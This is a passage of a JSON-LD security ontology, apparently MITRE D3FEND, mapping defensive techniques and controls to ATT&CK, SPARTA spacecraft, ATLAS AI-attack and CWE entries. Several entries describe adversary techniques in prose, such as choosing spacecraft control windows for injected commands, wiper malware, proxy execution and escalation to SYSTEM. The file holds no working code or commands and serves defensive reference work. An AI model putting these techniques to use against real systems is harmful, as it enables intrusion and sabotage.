      "d3f:attack-id": "REC-0001.06",
      "d3f:definition": "Threat actors collect details of the guidance, navigation, and control (GNC) stack to predict vehicle response and identify leverage points during station-keeping, momentum management, and anomaly recovery. Useful specifics include propulsion type and layout (monoprop/biprop/electric; thruster locations, minimum impulse bit, plume keep-out zones), reaction wheels/CMGs and desaturation logic, control laws and gains, estimator design (e.g., EKF), timing and synchronization, detumble/safe-mode behaviors, and the full sensor suite (star trackers, sun sensors, gyros/IMUs, GNSS). Artifacts include AOCS/AOCS ICDs, maneuver procedures, delta-v budgets, ephemeris products, scheduler tables, and wheel management timelines. Knowing when and how attitude holds, acquisition sequences, or wheel unloads occur helps an adversary choose windows where injected commands or bus perturbations have outsized effect, or where sensor blinding and spoofing are most disruptive.",
      "rdfs:label": "Maneuver & Control - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/06/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Maneuver & Control"
    },
    {
      "@id": "d3f:ST0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to maintain their foothold/access to command/execute code on the spacecraft.",
      "d3f:display-order": 5,
      "rdfs:label": "Persistence - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Persistence"
    },
    {
      "@id": "d3f:FileCreationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileCreationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:CreateFile"
      },
      "d3f:d3fend-id": "D3-FCA",
      "d3f:definition": "Analyzing the properties of file create system call invocations.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-LsassProcessDumpViaProcdump_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-001%3AScheduledTask-FileAccess_MITRE"
        }
      ],
      "rdfs:label": "File Creation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCallAnalysis"
        },
        {
          "@id": "_:N28165231250248479e6d502f37bc3048"
        }
      ]
    },
    {
      "@id": "_:N28165231250248479e6d502f37bc3048",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "d3f:T0845",
      "@type": "owl:Class",
      "d3f:attack-id": "T0845",
      "d3f:definition": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.",
      "rdfs:label": "Program Upload - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Program Upload"
    },
    {
      "@id": "d3f:NamedPipe",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a named pipe (also known as a FIFO for its behavior) is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of inter-process communication (IPC). The concept is also found in OS/2 and Microsoft Windows, although the semantics differ substantially. A traditional pipe is 'unnamed' and lasts only as long as the process. A named pipe, however, can last as long as the system is up, beyond the life of the process. It can be deleted if no longer used. Usually a named pipe appears as a file, and generally processes attach to it for IPC.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Named_pipe"
      },
      "rdfs:label": "Named Pipe",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Named_pipe"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:T1218.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.012",
      "d3f:definition": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)",
      "rdfs:label": "Verclsid",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:CWE-566",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-566",
      "d3f:definition": "The product uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.",
      "rdfs:label": "Authorization Bypass Through User-Controlled SQL Primary Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-639"
      }
    },
    {
      "@id": "d3f:EX-0010.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0010.02",
      "d3f:definition": "Wipers deliberately destroy or irreversibly corrupt data and, in some cases, executable images to impair or end mission operations. Destructive routines may overwrite with patterns or pseudorandom data, repeatedly reformat volumes, trigger wear mechanisms on non-volatile memory, or manipulate low-level translation layers so recovery tools see a blank or inconsistent device. Activation can be immediate or staged, sleeping until a specific time, pass, or maintenance action, and may be paired with anti-recovery steps such as erasing checksums, undo logs, or golden images. Because wipers operate at storage and image layers that underpin many subsystems, collateral effects can cascade: autonomy enters safing without viable recovery paths, downlinks carry only noise, and subsequent updates cannot be authenticated or applied. The defining feature is irreversible loss of data or executables as the primary objective, rather than concealment or monetization.",
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Wiper Malware - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0010"
        },
        {
          "@id": "_:Nbedff34113fd45999cdf42124cc3b377"
        }
      ],
      "skos:prefLabel": "Wiper Malware"
    },
    {
      "@id": "_:Nbedff34113fd45999cdf42124cc3b377",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:REC-0003.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.03",
      "d3f:definition": "Beyond TT&C, many missions expose additional RF or network surfaces: high-rate payload downlinks (e.g., X/Ka-band), user terminals, inter-satellite crosslinks, and hosted-payload channels that may be operated by different organizations. Adversaries scan spectrum and public telemetry repositories for these mission-specific channels, characterizing carrier plans, burst structures, access schemes (TDMA/FDMA/CDMA), addressing, and gateway locations. For commercial services, they enumerate forward/return links, user terminal waveforms, and provisioning backends that could be impersonated or jammed selectively. In hosted-payload or rideshare contexts, differences in configuration control and key management present opportunities for pivoting between enclaves.",
      "rdfs:label": "Mission-Specific Channel Scanning - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Mission-Specific Channel Scanning"
    },
    {
      "@id": "d3f:CWE-1268",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1268",
      "d3f:definition": "The product's hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies.",
      "rdfs:label": "Policy Privileges are not Assigned Consistently Between Control and Data Agents",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1202",
      "@type": "owl:Class",
      "d3f:attack-id": "T1202",
      "d3f:definition": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)",
      "rdfs:label": "Indirect Command Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1039",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:NetworkFileShareResource"
      },
      "d3f:attack-id": "T1039",
      "d3f:definition": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.",
      "rdfs:label": "Data from Network Shared Drive",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N632f4d411c91466c9693c855dc1743e9"
        }
      ]
    },
    {
      "@id": "_:N632f4d411c91466c9693c855dc1743e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkFileShareResource"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-011%3ACreateRemoteThreadIntoLSASS_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-011/"
      },
      "d3f:kb-abstract": "Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-011: Create Remote Thread into LSASS",
      "rdfs:label": "Reference - CAR-2021-05-011: Create Remote Thread into LSASS - MITRE"
    },
    {
      "@id": "d3f:AML.T0008.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.000",
      "d3f:definition": "Developing and staging AI attacks often requires expensive compute resources.\nAdversaries may need access to one or many GPUs in order to develop an attack.\nThey may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations.\nMultiple workspaces may be used to avoid detection.",
      "rdfs:label": "AI Development Workspaces - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "AI Development Workspaces"
    },
    {
      "@id": "d3f:FileContentBlockMetadata",
      "@type": "owl:Class",
      "d3f:definition": "Content Blocks may contain metadata specific to the block's content at the beginning.",
      "rdfs:label": "File Content Block Metadata",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:PhysicalAccessMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalAccessMonitoring"
      ],
      "d3f:d3fend-id": "D3-PHAM",
      "d3f:definition": "Monitoring the physical access of a specified environment through detection, recording, reviewing, and logging of who/what enters and exists areas.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-SP-800-53-R5"
      },
      "rdfs:label": "Physical Access Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N83ee75b392ea4359a86e149ddfa0d1b7"
        }
      ]
    },
    {
      "@id": "_:N83ee75b392ea4359a86e149ddfa0d1b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:BrowserExtension",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A browser extension is a plug-in that extends the functionality of a web browser in some way. Some extensions are authored using web technologies such as HTML, JavaScript, and CSS. Browser extensions can change the user interface of the web browser without directly affecting viewable content of a web page; for example, by adding a \"toolbar.\"",
      "d3f:extends": {
        "@id": "d3f:Browser"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Browser_extension"
      },
      "rdfs:label": "Browser Extension",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserApplication"
        },
        {
          "@id": "_:Ne41231a531e344e0aa708624060dd918"
        }
      ]
    },
    {
      "@id": "_:Ne41231a531e344e0aa708624060dd918",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:extends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Browser"
      }
    },
    {
      "@id": "d3f:CWE-693",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-693",
      "d3f:definition": "The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.",
      "rdfs:label": "Protection Mechanism Failure",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:CWE-312",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-312",
      "d3f:definition": "The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere.",
      "rdfs:label": "Cleartext Storage of Sensitive Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-311"
        },
        {
          "@id": "d3f:CWE-922"
        }
      ]
    },
    {
      "@id": "d3f:Deceive",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The deceive tactic is used to advertise, entice, and allow potential attackers access to an observed or controlled environment.",
      "d3f:display-order": 3,
      "d3f:display-priority": 0,
      "rdfs:label": "Deceive",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:T1548.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1548.006",
      "d3f:definition": "Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to execute malicious applications with elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).",
      "rdfs:label": "TCC Manipulation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1548"
      }
    },
    {
      "@id": "d3f:T1578.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.005",
      "d3f:definition": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.",
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Modify Cloud Compute Configurations",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:Nde31cbf881a449d393b64b17e410f1af"
        }
      ]
    },
    {
      "@id": "_:Nde31cbf881a449d393b64b17e410f1af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:IdentifierActivityAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IdentifierActivityAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Identifier"
      },
      "d3f:d3fend-id": "D3-IAA",
      "d3f:definition": "Taking known malicious identifiers and determining if they are present in a system.",
      "d3f:kb-article": "## How it works\n\nIdentifier activity analysis is the process of taking identifiers--typically known malicious identifiers--and determining the artifacts that have interacted with those identifiers.\n\nThere are many open and closed source repositories of identifiers that represent indicators of compromise. For example, VirusTotal contains hash signatures of malware and IP Addresses used by threat actors. Defenders can search for these indicators of compromise their own systems to gain context on activity around an identifier.\n\n## Considerations\n\nIndicator activity analysis is a good way to gain high precision analysis, but adversaries can modify their own signatures such as hashes quickly to evade detection. This is related to David Bianco’s Pyramid of Pain - Indicators on the lower level (hash values, IP addresses domain names) are easy for adversaries to change.\n\nIdentifier activity data of interest for analysis with the identifier might include, but is not limited to:\n\n* network traffic activity where the identifier was used to identify communicating entities or referred to in the communication\n* process activity referencing the identifier, especially for resource access\n* file activity referencing the identifier\n* registry settings referencing the identifier",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ThePyramidOfPain-DavidBianco"
      },
      "rdfs:label": "Identifier Activity Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "_:N1a11e88202b74384b5b6d716a179589c"
        }
      ]
    },
    {
      "@id": "_:N1a11e88202b74384b5b6d716a179589c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "d3f:drives",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x drives y: The device driver x causes a system component y to function by controlling it.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01184038-v"
      },
      "rdfs:label": "drives",
      "rdfs:seeAlso": {
        "@id": "dbr:Device_driver"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T0819",
      "@type": "owl:Class",
      "d3f:attack-id": "T0819",
      "d3f:definition": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.",
      "rdfs:label": "Exploit Public-Facing Application - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploit Public-Facing Application"
    },
    {
      "@id": "d3f:OSAPICreateSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a socket.",
      "d3f:invokes": {
        "@id": "d3f:CreateSocket"
      },
      "rdfs:label": "OS API Create Socket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N844fadb1e70c47668d7c7e5988827160"
        }
      ]
    },
    {
      "@id": "_:N844fadb1e70c47668d7c7e5988827160",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateSocket"
      }
    },
    {
      "@id": "d3f:M1054",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "d3f:CertificatePinning"
        }
      ],
      "rdfs:label": "Software Configuration"
    },
    {
      "@id": "d3f:BiometricAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BiometricAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Person"
      },
      "d3f:d3fend-id": "D3-BAN",
      "d3f:definition": "Using biological measures in order to authenticate a user.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-TokenlessBiometricTransactionAuthorizationMethodAndSystem"
        },
        {
          "@id": "d3f:Reference-www.biometric-solutions.com_keystroke-dynamics"
        }
      ],
      "rdfs:label": "Biometric Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:N0ff416af138c48088d511c73e336560c"
        }
      ]
    },
    {
      "@id": "_:N0ff416af138c48088d511c73e336560c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Person"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-02-002%3AGetSystemElevation_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-02-002/"
      },
      "d3f:kb-abstract": "Cyber actors frequently escalate to the SYSTEM account after gaining entry to a Windows host, to enable them to carry out various attacks more effectively. Tools such as Meterpreter, Cobalt Strike, and Empire carry out automated steps to “Get System”, which is the same as switching over to the System user account. Most of these tools utilize multiple techniques to try and attain SYSTEM: in the first technique, they create a named pipe and connects an instance of cmd.exe to it, which allows them to impersonate the security context of cmd.exe, which is SYSTEM. In the second technique, a malicious DLL is injected into a process that is running as SYSTEM; the injected DLL steals the SYSTEM token and applies it where necessary to escalate privileges. This analytic looks for both of these techniques.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-02-002: Get System Elevation",
      "rdfs:label": "Reference - CAR-2021-02-002: Get System Elevation - MITRE"
    },
    {
      "@id": "d3f:SpectralClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SC",
      "d3f:definition": "Spectral clustering is a technique that identifies communities of nodes in a graph based on the edges connecting them.",
      "d3f:kb-article": "## References\nTowards Data Science. (n.d.). Spectral Clustering. [Link](https://towardsdatascience.com/spectral-clustering-aba2640c0d5b)",
      "rdfs:label": "Spectral Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Graph-basedClustering"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IR-4_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Incident Handling | Behavior Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "d3f:DecoyObject"
        }
      ],
      "rdfs:label": "IR-4(13)"
    },
    {
      "@id": "d3f:FileContentBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A section within a file that contains the main content or data payload.",
      "rdfs:label": "File Content Block",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:AuthorizationService",
      "@type": "owl:Class",
      "d3f:definition": "An authorization service ensures that the user is authorized to have access to a particular resource. Authorization can be done through role-based access control (RBAC) or list-based access control (LBAC).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.sciencedirect.com/referencework/9780122272400/encyclopedia-of-information-systems"
      },
      "rdfs:label": "Authorization Service",
      "rdfs:seeAlso": {
        "@id": "dbr:Authorization"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkService"
        },
        {
          "@id": "d3f:ServiceApplicationProcess"
        }
      ]
    },
    {
      "@id": "d3f:T1482",
      "@type": "owl:Class",
      "d3f:attack-id": "T1482",
      "d3f:definition": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
      "rdfs:label": "Domain Trust Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CWE-706",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-706",
      "d3f:definition": "The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.",
      "rdfs:label": "Use of Incorrectly-Resolved Name or Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:OTCreateDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that creates data on a remote device.",
      "rdfs:label": "OT Create Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTWriteCommandEvent"
        },
        {
          "@id": "_:N6e225456eb664212b21fe9c834c70511"
        }
      ]
    },
    {
      "@id": "_:N6e225456eb664212b21fe9c834c70511",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTCreateDataCommand"
      }
    },
    {
      "@id": "d3f:CWE-1281",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1281",
      "d3f:definition": "Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed.",
      "rdfs:label": "Sequence of Processor Instructions Leads to Unexpected Behavior",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:CWE-829",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-829",
      "d3f:definition": "The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.",
      "rdfs:label": "Inclusion of Functionality from Untrusted Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-669"
      }
    },
    {
      "@id": "d3f:AML.T0008.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.003",
      "d3f:definition": "Adversaries may acquire or manufacture physical countermeasures to aid or support their attack.\n\nThese components may be used to disrupt or degrade the model, such as adversarial patterns printed on stickers or T-shirts, disguises, or decoys. They may also be used to disrupt or degrade the sensors used in capturing data, such as laser pointers, light bulbs, or other tools.",
      "rdfs:label": "Physical Countermeasures - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Physical Countermeasures"
    },
    {
      "@id": "d3f:PasswordAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PasswordAuthentication"
      ],
      "d3f:d3fend-id": "D3-PWA",
      "d3f:definition": "Password authentication is a security mechanism used to verify the identity of a user or entity attempting to access a system or resource by requiring the input of a secret string of characters, known as a password, that is associated with the user or entity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:uses": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "Password Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:Nf7a46b167e614c85b94d393d05ffcc7e"
        }
      ]
    },
    {
      "@id": "_:Nf7a46b167e614c85b94d393d05ffcc7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:CCI-002613_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization installs organization-defined security-relevant software updates automatically to organization-defined information system components.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002613"
    },
    {
      "@id": "d3f:NetworkScanner",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network scanner is a computer program used to retrieve usernames and info on groups, shares, and services of networked computers. This type of program scans networks for vulnerabilities in the security of that network. If there is a vulnerability with the security of the network, it will send a report back to a hacker who may use this info to exploit that network glitch to gain entry to the network or for other malicious activities. Ethical hackers often also use the information to remove the glitches and strengthen their network.",
      "d3f:monitors": {
        "@id": "d3f:Network"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Network_enumeration"
      },
      "rdfs:label": "Network Scanner",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Network_enumeration#Software"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberSensor"
        },
        {
          "@id": "_:Ne11a35d691fc4975ac88f56856cdbc1d"
        }
      ],
      "skos:altLabel": "Network Enumerator"
    },
    {
      "@id": "_:Ne11a35d691fc4975ac88f56856cdbc1d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:CCI-002883_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system restricts the use of maintenance tools to authorized personnel only.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-22T00:00:00"
      },
      "rdfs:label": "CCI-002883"
    },
    {
      "@id": "d3f:Software",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Computer software, or simply software, is that part of a computer system that consists of encoded information or computer instructions, in contrast to the physical hardware from which the system is built.",
